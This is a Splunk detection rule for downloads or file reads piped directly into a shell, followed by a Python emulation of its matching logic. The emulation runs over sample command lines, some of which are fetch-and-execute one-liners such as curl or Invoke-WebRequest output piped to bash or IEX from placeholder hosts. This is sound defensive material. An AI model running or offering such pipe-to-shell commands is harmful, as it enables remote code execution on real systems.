File Download or Read to Pipe Execution
- source: splunk
- techniques:
- T1105
Description
The following analytic detects the use of download or file reading utilities from Windows, Linux or MacOS to download or read the contents of a file from a remote or local source and pipe it directly to a shell for execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions. This activity is significant as it is commonly associated with malicious actions like coinminers and exploits such as CVE-2021-44228 in Log4j. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise and unauthorized access to sensitive data.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
from datamodel=Endpoint.Processes where
``` This aims to cover download utilities and file reading ones ```
Processes.process IN (
"*.DownloadFile(*",
"*.DownloadString(*",
"*ASCII.GetString*",
"*bitsadmin*",
"*certutil*",
"*curl*",
"*Invoke-RestMethod*",
"*Invoke-WebRequest*",
"*irm*",
"*iwr *",
"*mshta*",
"*wget*"
)
Processes.process IN ("*|*")
(
``` Linux / MacOS ```
Processes.process IN (
"*bash*",
"*csh*",
"*dash*",
"*fish*",
"*ksh*",
"*rbash*",
"*tcsh*",
"*zsh*"
)
OR
``` Because the "sh" string can overlap and is a short atom we treat it in a special case ```
Processes.process IN (
"*|sh",
"* sh*"
)
OR
``` Windows ```
Processes.process IN ("*IEX*", "*Invoke-Expression*")
)
by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path Processes.process
Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `file_download_or_read_to_pipe_execution_filter`
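To see what the WHERE clause above actually matches, here is an added Python emulation of its three wildcard groups run over constructed command lines (example code, not part of the Splunk rule). It assumes Splunk's default case-insensitive wildcard matching and ignores the tstats aggregation and by-clause, so it only answers "would this command line be reported?".

```python
import re

# Wildcard lists transcribed from the SPL WHERE clause above.
DOWNLOAD_OR_READ = ["*.DownloadFile(*", "*.DownloadString(*", "*ASCII.GetString*",
                    "*bitsadmin*", "*certutil*", "*curl*", "*Invoke-RestMethod*",
                    "*Invoke-WebRequest*", "*irm*", "*iwr *", "*mshta*", "*wget*"]
PIPE = ["*|*"]
UNIX_SHELLS = ["*bash*", "*csh*", "*dash*", "*fish*", "*ksh*", "*rbash*", "*tcsh*", "*zsh*"]
SH_SPECIAL = ["*|sh", "* sh*"]          # the short "sh" atom handled separately
WINDOWS_EVAL = ["*IEX*", "*Invoke-Expression*"]


def wildcard_to_regex(pattern):
    """Splunk '*' matches any run of characters; everything else is literal.
    Assumption: matching is case-insensitive, Splunk's default for search strings."""
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile(body, re.IGNORECASE | re.DOTALL)


def any_match(process, patterns):
    return any(wildcard_to_regex(p).fullmatch(process) for p in patterns)


def matches(process):
    """Mirror of the WHERE clause: a fetch/read utility AND a literal pipe AND
    a shell (or PowerShell's IEX) somewhere in the same command line."""
    return (any_match(process, DOWNLOAD_OR_READ)
            and any_match(process, PIPE)
            and (any_match(process, UNIX_SHELLS)
                 or any_match(process, SH_SPECIAL)
                 or any_match(process, WINDOWS_EVAL)))


def evaluate(process_lines):
    """Return the command lines the rule would report, in input order."""
    return [p for p in process_lines if matches(p)]


# Constructed command lines (not real telemetry); URLs are placeholders.
SAMPLE_PROCESSES = [
    "curl -s http://example.invalid/setup.sh | bash",               # fires: curl + pipe + bash
    "wget -qO- http://example.invalid/run | sh",                     # fires via the "* sh*" special case
    'powershell -c "Invoke-WebRequest http://example.invalid/a.ps1 | IEX"',  # fires: iwr + pipe + IEX
    'powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',  # no "|": silent
    "certutil -urlcache -f http://example.invalid/x.txt out.txt",    # download but no pipe: silent
    "curl https://example.invalid/data.json | jq .",                 # pipe to a non-shell: silent
    "cat /var/log/curl_install.log | grep -i bash",                  # benign, yet "curl"/"bash" substrings fire
]

if __name__ == "__main__":
    for line in SAMPLE_PROCESSES:
        print("HIT " if matches(line) else "    ", line)
```

The last two silent samples and the final benign hit are the points to keep in mind when tuning `file_download_or_read_to_pipe_execution_filter`: the rule needs a literal `|` in the command line, and every atom is a substring match.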